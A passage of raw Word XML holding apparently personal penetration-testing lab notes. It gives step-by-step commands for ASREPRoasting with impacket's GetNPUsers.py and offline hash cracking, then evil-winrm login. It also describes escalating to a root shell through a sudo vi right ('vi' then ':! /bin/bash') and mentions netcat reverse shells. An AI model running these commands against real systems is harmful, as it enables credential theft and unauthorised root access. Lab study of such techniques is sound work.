              <w:t>pathfinder.megacorp.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-ns </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102406" w14:paraId="0E4CE632" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EEB3F30" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71E3C4C3" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A00731C" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102406" w14:paraId="00AA279D" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3727CAA8" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C96553E" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E50E690" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F86349" w14:paraId="6A40EDFB" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46773E26" w14:textId="145A54CD" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6798085A" w14:textId="77777777" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E8548A6" w14:textId="77777777" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F86349" w14:paraId="09EA9B87" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35AB8753" w14:textId="42F44403" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70CCBE7E" w14:textId="77777777" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ASREPRoasting</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2788695E" w14:textId="77777777" w:rsidR="005F3874" w:rsidRDefault="005F3874" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10735B37" w14:textId="5F5B249D" w:rsidR="005F3874" w:rsidRPr="005F3874" w:rsidRDefault="005F3874" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F3874">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F3874">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>GetNPUsers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F3874">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is a python script that comes as part of impacket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D82D6EC" w14:textId="6D6CBB6A" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:r>
              <w:t>If you can enumerate any accounts in a Windows domain that don’t require Kerberos pre</w:t>
            </w:r>
            <w:r w:rsidR="001A14F6">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>authentication, you can now easily request a piece of encrypted information for said accounts and efficiently crack the material offline, revealing the user’s password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7C02FB" w14:textId="77777777" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349"/>
          <w:p w14:paraId="347F1237" w14:textId="538B62ED" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:r>
              <w:t>Note: this isn’t anything revolutionary, and obviously isn’t as useful as Kerberoasting, as accounts have to have DONT_REQ_PREAUTH explicitly set for them to be vulnerable – you’re still reliant upon weak password complexity for the attack to work. However, this setting still exists on some accounts in some environments, we’re just not sure as to the frequency as it’s not something we normally looked for before.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F86349" w14:paraId="6BDA4230" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F395352" w14:textId="1C4EFA14" w:rsidR="00F86349" w:rsidRDefault="00156E85" w:rsidP="00F86349">
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="553E6779" w14:textId="77777777" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5614825E" w14:textId="29780041" w:rsidR="00F86349" w:rsidRDefault="00F86349" w:rsidP="00F86349">
            <w:r>
              <w:t>To use this command, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F86349">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>GetNPUsers.py</w:t>
            </w:r>
            <w:r w:rsidRPr="00F86349">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DOMAIN.NAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00F86349">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER_NAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00F86349">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F86349">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-request -no-pass -dc-ip </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F86349">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>If successful, this should grant us with a ticket granting ticket. From there, use that hash via john or hashcat to crack it. (See john).</w:t>
            </w:r>
            <w:r w:rsidR="00156E85">
              <w:t xml:space="preserve"> Simply copy and paste the hash into a txt file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102406" w14:paraId="595C59E8" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1ABE6AE9" w14:textId="53393A8E" w:rsidR="00102406" w:rsidRDefault="00156E85" w:rsidP="00F86349">
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="16181AF4" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35CECB5C" w14:textId="396EF679" w:rsidR="00102406" w:rsidRDefault="00156E85" w:rsidP="00F86349">
            <w:r>
              <w:t>If the password is successfully cracked, we can now use evil-winrm (see below) to use the credentials to gain access to the user account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102406" w14:paraId="4D7586A7" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46F1F465" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B399BBC" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C185B5A" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7253CCA9" w14:textId="2A985ED9" w:rsidR="001F411D" w:rsidRDefault="001F411D"/>
    <w:p w14:paraId="5C3BA5A3" w14:textId="154A9E62" w:rsidR="00DE1041" w:rsidRDefault="00AC7068">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28185A48" w14:textId="1F9EE1C6" w:rsidR="00DE1041" w:rsidRDefault="00DE1041" w:rsidP="00DE1041">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1081"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA7204" w14:paraId="65E8FBC9" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34EAA6D0" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="290E4325" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Or any reverse shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2332A428" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="00322D20" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF USING NETCAT TO GAIN A REVERSE SHELL INTO A MACHINE, AND THE USER HAS PRIVILIEGES TO WRITE TO pg_hba.conf THEN USE THIS COMMAND.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D05178" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
          <w:p w14:paraId="1AD2589D" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t xml:space="preserve">PLEASE NOTE, I AM CURRENTLY UNSURE BUT THIS MAY WORK WITH ANY FILE THAT HAS </w:t>
            </w:r>
            <w:r w:rsidRPr="001942F1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo </w:t>
            </w:r>
            <w:r w:rsidRPr="001942F1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin/vi </w:t>
            </w:r>
            <w:r>
              <w:t>PRIVILIEGES…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="129E47B8" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204"/>
          <w:p w14:paraId="5D3218A9" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t xml:space="preserve">You can use </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1041">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1041">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-l </w:t>
            </w:r>
            <w:r>
              <w:t>to see if you have access to pg_hba.conf and where the file is located within the machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="6954E863" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3610398B" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="277C5613" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67FEE2CD" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Use this command to open the file, note that it may glitch out though if the shell is a basic netcat shell as VIM text editor won’t quite work properly.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DE1041">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1041">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1041">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/bin/vi</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE1041">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/etc/postgresql/11/main/pg_hba.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384FD2C0" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r w:rsidRPr="00DE1041">
              <w:t>Note that the file may be found elsewhere in the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="4007552F" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79641998" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1036D12F" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2203C062" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>Once vi opens, simply type and press enter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E03DCD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E03DCD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F82DF2" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:r>
              <w:t>This will execute and a root shell will be spawned. Keep in mind that :! Essentially starts command mode in vim.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA7204" w14:paraId="1E5DE3D4" w14:textId="77777777" w:rsidTr="00EA7204">
        <w:trPr>
          <w:trHeight w:val="63"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="745BD5B8" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="002B5285" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="6"/>
                <w:szCs w:val="6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0222F865" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="002B5285" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:rPr>
                <w:sz w:val="6"/>
                <w:szCs w:val="6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="129FFA9C" w14:textId="77777777" w:rsidR="00EA7204" w:rsidRPr="002B5285" w:rsidRDefault="00EA7204" w:rsidP="00EA7204">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="6"/>
                <w:szCs w:val="6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
